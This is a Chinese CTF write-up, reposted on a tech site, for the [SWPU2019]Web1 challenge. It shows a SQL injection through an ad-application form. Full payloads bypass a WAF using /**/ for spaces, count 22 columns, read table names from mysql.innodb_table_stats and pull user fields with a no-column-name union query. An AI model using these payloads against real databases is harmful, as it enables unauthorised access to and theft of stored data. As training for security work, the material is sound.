| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 大数据 -> [SWPU2019]Web1wp -> 正文阅读 |
|
[大数据][SWPU2019]Web1wp |
我们用sql的惯用姿势1’ or 1=1#去试显示登录失败,也不是get方式传参,还有下面的注册,觉得这里不存在sql注入,注册后发现用户名叫admin已经被注册过了,也发现这里应该不存在注入,随便注册一个账号,登录看这个网站有什么功能。 发现可能在广告申请处有可能存在sql注入, 这里存在waf,于是fuzz测试一下,但是在测试时发现广告申请条数存在限制,必须要清空广告申请列表才可以写下一个申请,所以只能手动测试 我们发现有or # and --+被过滤了 我们发现空格被替换为空了所以空格也被过滤了,空格可以用/**/绕过 ?# --+注释符的话就用单引号闭合就ok or被过滤了的话就不能使用order by,information_schema 这里使用一个新的注入方法:无列名注入 1.这里检查数据库列数 -1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' 共有22列 ? ? 2.然后去爆数据库 1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' 3.爆表名,这里不能使用or,所以这里使用的是新的payload 1'/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"' 这里的表名是ads和users 4.去爆users的字段 1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' ? ? ? ? ? ? ? ? ? ? ? |
|
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/24 2:59:58- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |